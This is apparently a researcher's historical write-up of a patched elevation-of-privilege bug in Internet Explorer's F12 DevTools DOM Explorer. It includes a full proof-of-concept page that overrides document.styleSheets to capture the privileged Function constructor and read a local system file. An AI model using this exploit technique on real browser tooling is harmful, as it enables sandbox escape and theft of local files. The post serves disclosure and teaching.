F12 DevTools selectorText.split Elevation of Privilege

After playing around for a while with the F12 DOM Explorer, I found another spot where the tools consumed page-controlled data without proper isolation. This time the vulnerable line was in dom/cssinformationextractor.js: var selectorParts = selectorText.split(...). By overriding the styleSheets getter, a page could inject a fake rule object whose selectorText.split method captured the elevated Function constructor.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<title>Test</title>
</head>
<body>
Open DevTools and click on the DOM Explorer section. Exploit.<br /><br />

File: dom/cssinformationextractor.js<br />
Vulnerable Code: var selectorParts = selectorText.split(/([~+>,]|\s)+/);<br />

<script>
Object.defineProperty(document, 'styleSheets', {get:function(arg){
	var o = {"selectorText":{"split":function(arg){exploit(arg.constructor.constructor)}}};
	return [{"rules":[o]}];
}});

function exploit(F12Function)
{
	oXML = F12Function("return new XMLHttpRequest()")();
	oXML.open("GET", "file:///c:/windows/system32/drivers/etc/hosts", false);
	oXML.send(null);
	alert(oXML.responseText);
}  

</script>
</body>
</html>

The document.styleSheets getter was overridden to return a synthetic stylesheet whose rule had a poisoned selectorText.split function. When the F12 DOM Explorer iterated the page’s stylesheets to display CSS information, it called split on that object, passing in a regex — and the function received the regex’s constructor.constructor, which was the privileged Function from the DevTools context. Opening the DOM Explorer panel on a malicious page was enough to trigger the exploit.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.